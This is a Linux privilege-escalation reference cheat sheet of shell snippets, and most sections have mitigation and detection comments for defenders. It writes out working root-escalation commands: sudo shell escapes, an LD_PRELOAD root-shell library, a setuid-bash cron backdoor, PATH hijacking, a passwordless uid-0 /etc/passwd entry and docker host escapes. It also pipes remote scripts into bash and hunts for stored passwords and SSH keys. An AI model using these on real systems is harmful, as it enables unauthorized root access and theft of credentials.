# Linux privilege-escalation enumeration reference (cheat sheet).
# This is a list of independent snippets, not a script to run top to bottom:
# several lines alter system state (/tmp, /etc/passwd, PATH) and others use
# placeholder paths (/path/to/script.sh, ./vulnerable_suid_binary).
# Lines marked "Mitigation:" / "Detection:" are the defender-side counterpart
# of the technique above them.
# OS & kernel
uname -a
cat /etc/os-release
cat /proc/version
# Current user
id
whoami
sudo -l # What can we run as sudo?
# Users on system
cat /etc/passwd
cat /etc/shadow # Needs root
cat /etc/group
# Logged-in users
who
w
last
# Find SUID binaries (-perm -4000: setuid bit set, other bits ignored)
find / -perm -4000 -type f 2>/dev/null
# Find SGID binaries (-perm -2000: setgid bit set)
find / -perm -2000 -type f 2>/dev/null
# Both (-perm /6000: either bit set)
find / -perm /6000 -type f 2>/dev/null
# Check GTFOBins for abuse: https://gtfobins.github.io/
# Mitigation: keep a baseline of SUID/SGID files and alert on additions;
# strip the setuid bit from binaries that do not need it.
# List sudo rights
sudo -l
# Common abusable sudo entries (check GTFOBins)
# Mitigation: every program below can spawn a shell, so a sudoers entry for
# it is equivalent to granting a root shell. Detection: sudo logs the command
# line to syslog/journal; a shell whose parent is a sudo'd editor, pager or
# interpreter stands out in process-ancestry auditing.
sudo find . -exec /bin/bash \;
sudo vim -c '!bash'
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo awk 'BEGIN {system("/bin/bash")}'
sudo less /etc/passwd # then: !/bin/bash
sudo man man # then: !/bin/bash
# env_keep and LD_PRELOAD
# If sudo -l shows: env_keep+=LD_PRELOAD
# sudo's default env_reset drops LD_PRELOAD; it only reaches the target
# program when sudoers explicitly keeps it. Mitigation: never list LD_PRELOAD
# (or LD_LIBRARY_PATH) in env_keep. The shared object is staged in /tmp, so a
# noexec /tmp is a common hardening for this variant (verify on your platform).
cat > /tmp/priv.c << EOF
#include <stdio.h>
#include <stdlib.h>
void _init() { setuid(0); system("/bin/bash"); }
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/priv.so /tmp/priv.c
sudo LD_PRELOAD=/tmp/priv.so find
# List cron jobs
cat /etc/crontab
ls /etc/cron.d/
ls /etc/cron.daily/
crontab -l
cat /var/spool/cron/crontabs/root 2>/dev/null
# Check for writable scripts run by root cron
# If a cron job runs a writable script:
# (/path/to/script.sh is a placeholder for the script found above)
echo 'chmod +s /bin/bash' >> /path/to/script.sh
# Wait for cron, then:
# -p keeps the effective uid granted by the setuid bit instead of dropping it
bash -p
# Mitigation: cron-run scripts and their parent directories must be root-owned
# and not group/world writable. Detection: a setuid bit appearing on /bin/bash
# (or any shell) is a strong indicator; file-integrity monitoring catches it.
# World-writable files
# -writable is evaluated for the current user; grep -v drops any path that
# contains "proc", not only /proc
find / -writable -type f 2>/dev/null | grep -v proc
# Writable directories
find / -writable -type d 2>/dev/null
# PATH hijacking
# If a SUID binary calls a command without full path:
# (./vulnerable_suid_binary is a placeholder)
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
./vulnerable_suid_binary
# Mitigation: setuid programs must invoke helpers by absolute path or reset
# PATH before exec; a PATH starting with a world-writable directory is an
# audit finding on its own.
# Writable /etc/passwd
# Add root user: new:x:0:0:root:/root:/bin/bash
echo 'hacked::0:0:root:/root:/bin/bash' >> /etc/passwd
su hacked
# Mitigation: /etc/passwd must be root-owned and not writable by others.
# Detection: more than one uid-0 entry, or an empty password field, in
# /etc/passwd; file-integrity monitoring on /etc.
# Find binaries with capabilities
getcap -r / 2>/dev/null
# Common exploitable capabilities
# cap_setuid+ep on python3:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# cap_net_raw+ep → sniff traffic
# cap_dac_read_search+ep → read any file
# Mitigation: baseline file capabilities like SUID bits; cap_setuid and
# cap_dac_* on an interpreter are root-equivalent.
# Get kernel version
uname -r
# Search for exploits
# (4.4 is an example argument; use the value printed by uname -r)
searchsploit linux kernel 4.4
# OR use: https://github.com/mzet-/linux-exploit-suggester
# Download and run suggester
# Piping a remote script straight into bash runs whatever the server (or any
# on-path party) returns; download to a file, review it, and pin a checksum or
# commit before executing (same applies to linpeas.sh below).
curl -s https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash
# Config files with passwords
grep -r "password" /etc/ 2>/dev/null
grep -r "passwd" /var/www/ 2>/dev/null
grep -rn "DB_PASS\|db_password\|SECRET" /var/www/ 2>/dev/null
# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "*.pem" 2>/dev/null
cat ~/.bash_history
# Mitigation: secrets belong in a secret store or root-only files, not in web
# roots, world-readable configs or shell history.
# Web server configs
cat /etc/apache2/sites-enabled/*.conf
cat /etc/nginx/sites-enabled/*
# Check if in container
# NOTE(review): on cgroup v2 hosts /proc/1/cgroup may not mention docker — confirm
cat /proc/1/cgroup | grep docker
ls /.dockerenv
# If in docker group
# Mounts the host root into a container and chroots into it, so docker group
# membership is root on the host. Mitigation: do not add unprivileged users
# to the docker group; prefer rootless mode.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Privileged container escape
# /dev/sda1 is an example device; --privileged exposes host block devices.
# Mitigation: avoid --privileged, drop capabilities, keep the device cgroup
# restrictive.
mount /dev/sda1 /mnt
chroot /mnt
# LinPEAS (most comprehensive)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash
# LinEnum
./LinEnum.sh -s -k password -r report -e /tmp/ -t
# Linux Smart Enumeration
./lse.sh -l 1 # level 1 (default)
./lse.sh -l 2 # level 2 (more verbose)